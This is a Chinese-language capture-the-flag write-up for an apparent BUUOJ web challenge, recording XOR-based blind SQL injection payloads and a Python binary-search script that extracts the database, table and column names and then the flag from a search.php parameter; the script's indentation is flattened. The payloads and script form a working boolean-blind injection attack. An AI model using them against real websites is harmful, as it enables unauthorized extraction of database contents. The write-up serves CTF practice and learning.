说来话长,这边记录下,页面不一样了,之前的注入全部行不通,考虑盲注,利用二分法查找是非常快的
这边记下payload
查库名:id=1^(ascii(substr((select(database())),1,1))>1)^1
库名为geek
查表名:id=1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=%27geek%27)),1,1))>1)^1
表名为F1naI1y
查列名,还是得写脚本,
1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),1,1))>1)^1
import requests
import time
url = "http://acd0b80d-cfac-4ed8-aab6-7c6f64ee9fa2.node3.buuoj.cn/search.php?"
temp = {"id" : ""}
column = ""
for i in range(1,1000):
time.sleep(0.06)
low = 32
high =128
mid = (low+high)//2
while(low<high):
temp["id"] = "1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1" %(i,mid)
r = requests.get(url,params=temp)
print(low,high,mid,":")
if "Click" in r.text:
low = mid+1
else:
high = mid
mid =(low+high)//2
if(mid ==32 or mid ==127):
break
column +=chr(mid)
print(column)
print("column=" ,column)
emmmm,这题确实烦,手工注入会心态爆炸的。
查flag
1^(ascii(substr((select(group_concat(password))from(F1naI1y)),1,1))>1)^1
不得不说二分法查询真的特别省时间,主要是这题太恶心了
import requests
import time
url = "http://acd0b80d-cfac-4ed8-aab6-7c6f64ee9fa2.node3.buuoj.cn/search.php?"
temp = {"id" : ""}
column = ""
for i in range(1,1000):
time.sleep(0.06)
low = 32
high =128
mid = (low+high)//2
while(low<high):
temp["id"] = "1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" %(i,mid)
r = requests.get(url,params=temp)
print(low,high,mid,":")
if "Click" in r.text:
low = mid+1
else:
high = mid
mid =(low+high)//2
if(mid ==32 or mid ==127):
break
column +=chr(mid)
print(column)
print("flag=" ,column)
718
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
